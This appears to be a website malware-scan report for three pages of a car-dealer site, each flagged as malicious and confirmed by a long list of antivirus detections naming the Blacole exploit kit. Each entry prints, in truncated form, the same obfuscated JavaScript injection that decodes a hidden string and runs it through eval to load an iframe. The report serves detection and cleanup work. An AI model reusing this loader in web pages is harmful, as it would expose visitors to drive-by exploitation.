Malicious code - confirmed by antiviruses (see below) gbmv=document;pjam="spl"+"i"+"t";hsk=window;dzpo="0"+"x";smc=(5-3-1);try{--(gbmv["body"])}catch(dfgpz){uqyyqt=false;try{}catch(sxvai){uqyyqt=21;}if(1){cqroz="17:5d:6c:65:5a:6b:60:66:65:17:61:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:61:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:
... 3388 bytes are skipped ...a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:61:60:27:30:1f:20:32:4:1:74:4:1:74"[pjam](":");}hsk=cqroz;lpm=[];for(ift=22-20-2;-ift+1383!=0;ift+=1){rjj=ift;if((0x19==031))lpm+=String.fromCharCode(eval(dzpo+hsk[1*rjj])+0xa-smc);}vjewlo=eval;vjewlo(lpm)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.phoenixbuymyride.com/getacarloan.php | 200 OK Content-Length: 21636 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) gbmv=document;pjam="spl"+"i"+"t";hsk=window;dzpo="0"+"x";smc=(5-3-1);try{--(gbmv["body"])}catch(dfgpz){uqyyqt=false;try{}catch(sxvai){uqyyqt=21;}if(1){cqroz="17:5d:6c:65:5a:6b:60:66:65:17:61:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:61:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b ...[3928 bytes skipped]... Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.phoenixbuymyride.com/faq.php | 200 OK Content-Length: 25701 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) gbmv=document;pjam="spl"+"i"+"t";hsk=window;dzpo="0"+"x";smc=(5-3-1);try{--(gbmv["body"])}catch(dfgpz){uqyyqt=false;try{}catch(sxvai){uqyyqt=21;}if(1){cqroz="17:5d:6c:65:5a:6b:60:66:65:17:61:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:61:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:
... 3388 bytes are skipped ...a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:61:60:27:30:1f:20:32:4:1:74:4:1:74"[pjam](":");}hsk=cqroz;lpm=[];for(ift=22-20-2;-ift+1383!=0;ift+=1){rjj=ift;if((0x19==031))lpm+=String.fromCharCode(eval(dzpo+hsk[1*rjj])+0xa-smc);}vjewlo=eval;vjewlo(lpm)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.phoenixbuymyride.com/customertestimonial.php | 200 OK Content-Length: 30832 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) gbmv=document;pjam="spl"+"i"+"t";hsk=window;dzpo="0"+"x";smc=(5-3-1);try{--(gbmv["body"])}catch(dfgpz){uqyyqt=false;try{}catch(sxvai){uqyyqt=21;}if(1){cqroz="17:5d:6c:65:5a:6b:60:66:65:17:61:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:61:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:
... 3388 bytes are skipped ...a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:61:60:27:30:1f:20:32:4:1:74:4:1:74"[pjam](":");}hsk=cqroz;lpm=[];for(ift=22-20-2;-ift+1383!=0;ift+=1){rjj=ift;if((0x19==031))lpm+=String.fromCharCode(eval(dzpo+hsk[1*rjj])+0xa-smc);}vjewlo=eval;vjewlo(lpm)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1215
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- BitDefender
- JS:Exploit.JS.Blacole.Z
|